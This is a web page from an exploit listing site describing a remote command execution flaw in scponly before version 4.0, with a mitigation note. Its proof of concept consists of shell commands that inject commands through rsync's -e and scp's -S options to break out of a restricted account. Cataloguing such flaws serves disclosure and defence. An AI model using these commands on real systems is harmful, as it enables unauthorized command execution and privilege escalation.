Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
scponly Remote Arbitrary Command Execution Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
scponly
by:
Unknown
7.5
CVSS
HIGH
Remote Arbitrary Command Execution
78
CWE
Product Name: scponly
Affected Version From: Prior to version 4.0
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:scponly:scponly
Metasploit:
Other Scripts:
Platforms Tested: Linux, Unix
Unknown

scponly Remote Arbitrary Command Execution Vulnerability

scponly is reported prone to a remote arbitrary command execution vulnerability. This issue may allow a remote attacker to execute commands and scripts on a vulnerable computer and eventually allow an attacker to gain elevated privileges on a vulnerable computer.

Mitigation:

Update to version 4.0 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11791/info

scponly is reported prone to a remote arbitrary command execution vulnerability. This issue may allow a remote attacker to execute commands and scripts on a vulnerable computer and eventually allow an attacker to gain elevated privileges on a vulnerable computer.

Versions prior to 4.0 are reported susceptible to this issue.

ssh restricteduser@remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp'

scp command.sh restricteduser@remotehost:/tmp/command.sh

ssh restricteduser@remotehost 'scp -S /tmp/command.sh localhost:/dev/null /tmp'